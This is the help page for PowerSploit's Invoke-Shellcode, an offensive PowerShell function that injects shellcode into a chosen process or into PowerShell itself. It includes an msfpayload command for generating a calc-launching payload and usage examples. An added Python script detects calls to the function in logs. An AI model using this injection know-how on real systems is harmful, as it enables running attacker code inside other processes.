# Invoke-Shellcode
## SYNOPSIS
Inject shellcode into the process ID of your choosing or within the context of the running PowerShell process.
PowerSploit Function: Invoke-Shellcode
Author: Matthew Graeber (@mattifestation)
License: BSD 3-Clause
Required Dependencies: None
Optional Dependencies: None
## SYNTAX
```
Invoke-Shellcode [-ProcessID <UInt16>] [-Shellcode <Byte[]>] [-Force]
```
## DESCRIPTION
Portions of this project were based upon syringe.c v1.2 written by Spencer McIntyre.
PowerShell expects shellcode to be in the form 0xXX,0xXX,0xXX.
To generate your shellcode in this form, you can use this command from within Backtrack (Thanks, Matt and g0tm1lk):
```
msfpayload windows/exec CMD="cmd /k calc" EXITFUNC=thread C | sed '1,6d;s/[";]//g;s/\\/,0/g' | tr -d '\n' | cut -c2-
```
Make sure to specify 'thread' for your exit function (EXITFUNC=thread).
Also, don't bother encoding your shellcode.
It's entirely unnecessary.
## EXAMPLES
### -------------------------- EXAMPLE 1 --------------------------
```
Invoke-Shellcode -ProcessId 4274
```
Description
-----------
Inject shellcode into process ID 4274.
### -------------------------- EXAMPLE 2 --------------------------
```
Invoke-Shellcode
```
Description
-----------
Inject shellcode into the running instance of PowerShell.
### -------------------------- EXAMPLE 3 --------------------------
```
Invoke-Shellcode -Shellcode @(0x90,0x90,0xC3)
```
Description
-----------
Overrides the shellcode included in the script with custom shellcode: 0x90 (NOP), 0x90 (NOP), 0xC3 (RET).
Warning: This script has no way to validate that your shellcode is 32 vs. 64-bit!
## PARAMETERS
### -ProcessID
Process ID of the process you want to inject shellcode into.
```yaml
Type: UInt16
Parameter Sets: (All)
Aliases:
Required: False
Position: Named
Default value: 0
Accept pipeline input: False
Accept wildcard characters: False
```
### -Shellcode
Specifies optional shellcode passed in as a byte array.
```yaml
Type: Byte[]
Parameter Sets: (All)
Aliases:
Required: False
Position: Named
Default value: None
Accept pipeline input: False
Accept wildcard characters: False
```
### -Force
Injects shellcode without prompting for confirmation.
By default, Invoke-Shellcode prompts for confirmation before performing any malicious act.
```yaml
Type: SwitchParameter
Parameter Sets: (All)
Aliases:
Required: False
Position: Named
Default value: False
Accept pipeline input: False
Accept wildcard characters: False
```
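As an added defender-side example (not part of PowerSploit or this help page), the following Python triages command text such as PowerShell script-block log entries for calls to this function, using only what the page documents: the function name, whether -ProcessID targets another process or the call defaults to the running PowerShell process, whether -Force suppressed the confirmation prompt, and whether an inline 0xXX byte array was passed via -Shellcode. The sample lines are constructed, and matching full parameter names only (not PowerShell's abbreviated prefixes) is an assumption.

```python
import re

# Constructed sample command lines in the shape of PowerShell script-block
# log text (not real captures); they cover the three usages in the help.
SAMPLE_SCRIPT_BLOCKS = [
    "Invoke-Shellcode -ProcessId 4274",
    "Invoke-Shellcode",
    "Invoke-Shellcode -Shellcode @(0x90,0x90,0xC3) -Force",
    "invoke-shellcode -processid 4274 -force -shellcode @(0xCC,0xC3)",
    "Get-Process | Where-Object { $_.Id -eq 4274 }",
]

# PowerShell names are case-insensitive; matching only the full parameter
# names from the help (not abbreviated prefixes) is an assumption here.
_CALL = re.compile(r"\binvoke-shellcode\b", re.IGNORECASE)
_PID = re.compile(r"-processid\s+(\d+)", re.IGNORECASE)
_FORCE = re.compile(r"-force\b", re.IGNORECASE)
_BYTES = re.compile(
    r"@\(\s*((?:0x[0-9a-f]{2}\s*,\s*)*0x[0-9a-f]{2})\s*\)", re.IGNORECASE)


def triage_script_block(text):
    """Return None if `text` does not call Invoke-Shellcode, otherwise a
    dict describing what the call would do according to the help page."""
    if not _CALL.search(text):
        return None
    pid = _PID.search(text)
    blob = _BYTES.search(text)
    return {
        # no -ProcessID (default 0) means the running PowerShell process
        "target": "pid %s" % pid.group(1) if pid else "self",
        # -Force suppresses the confirmation prompt shown by default
        "prompt_suppressed": bool(_FORCE.search(text)),
        # count of 0xXX bytes in an inline -Shellcode literal, 0 if the
        # built-in payload would be used
        "inline_bytes": len(blob.group(1).split(",")) if blob else 0,
    }


def triage_all(lines):
    """Pair each line that calls Invoke-Shellcode with its triage dict."""
    hits = []
    for line in lines:
        result = triage_script_block(line)
        if result is not None:
            hits.append((line, result))
    return hits
```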
## INPUTS
## OUTPUTS
## NOTES
## RELATED LINKS